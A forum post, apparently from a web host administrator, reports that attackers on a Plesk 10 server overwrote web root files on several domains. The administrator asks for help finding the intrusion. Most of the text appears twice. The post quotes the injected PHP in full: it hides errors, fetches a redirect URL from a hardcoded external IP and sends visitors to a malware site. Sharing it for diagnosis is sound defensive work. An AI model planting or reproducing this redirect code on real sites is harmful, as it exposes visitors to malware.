I run several domains under Plesk 10.0.0.
Last night I discovered that one of my domains had all the html and php files in the directory replaced with files that redirected visitors to a malware site. There was also a new domain created with a number of files in the directories. A quick Google search turned up a thread that showed I wasn't the only one: http://www.webhostingtalk.com/showthread.php?t=1253158
I removed the new domain and files, then replaced all the pages with redirects. I then changed my access passwords. Finally, I updated to Plesk 11.0.9. This was at 5am this morning.
I just discovered that there were two additional occurrences after this... one about two hours later and another about two hours after that. From what I've found, three other domains had all their web root directory files overwritten with files that included the following php code:
I once again replaced the files and changed some passwords. I checked web access and Plesk logs, but there's nothing out of the ordinary. I ran Watchdog, but nothing came up that I couldn't rule out from Google searches.
Any ideas on where to look for the problem?
Last night I discovered that one of my domains had all the html and php files in the directory replaced with files that redirected visitors to a malware site. There was also a new domain created with a number of files in the directories. A quick Google search turned up a thread that showed I wasn't the only one: http://www.webhostingtalk.com/showthread.php?t=1253158
I removed the new domain and files, then replaced all the pages with redirects. I then changed my access passwords. Finally, I updated to Plesk 11.0.9. This was at 5am this morning.
I just discovered that there were two additional occurrences after this... one about two hours later and another about two hours after that. From what I've found, three other domains had all their web root directory files overwritten with files that included the following php code:
Code:
ini_set('display_errors',0);
if(!function_exists('sys_get_temp_dir')){
function sys_get_temp_dir(){
if(!empty($_ENV['TMP'])){
return realpath($_ENV['TMP']);
}
if(!empty($_ENV['TMPDIR'])){
return realpath($_ENV['TMPDIR']);
}
if(!empty($_ENV['TEMP'])){
return realpath($_ENV['TEMP']);
}
$tempfile=tempnam(__FILE__,'');
if(file_exists($tempfile)){
unlink($tempfile);
return realpath(dirname($tempfile));
}
return null;
}
}
$geturl='http://188.190.124.81/tds.php';
$timeout=180;
$default_url='http://www.google.com/robots.txt';
if(!$geturl)exit();
$base=ini_get('upload_tmp_dir');
if($base==null)$base=sys_get_temp_dir();
$tmp_settings=$base."/settings.json";
$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0,'url'=>$default_url);
if($settings['last']<time()-$timeout){
if($settings['url']=file_get_contents($geturl)){
$settings['last']=time();
$fp=fopen($tmp_settings,'w');
flock($fp,LOCK_EX);
fputs($fp,serialize($settings));
flock($fp,LOCK_UN);
fclose($fp);
}
}
$url=$settings['url']?$settings['url']:file_get_contents($geturl);
if(substr($url,0,4)!='http')$url="http://".$url."/";
header("Location: $url");
exit();
I once again replaced the files and changed some passwords. I checked web access and Plesk logs, but there's nothing out of the ordinary. I ran Watchdog, but nothing came up that I couldn't rule out from Google searches.
Any ideas on where to look for the problem?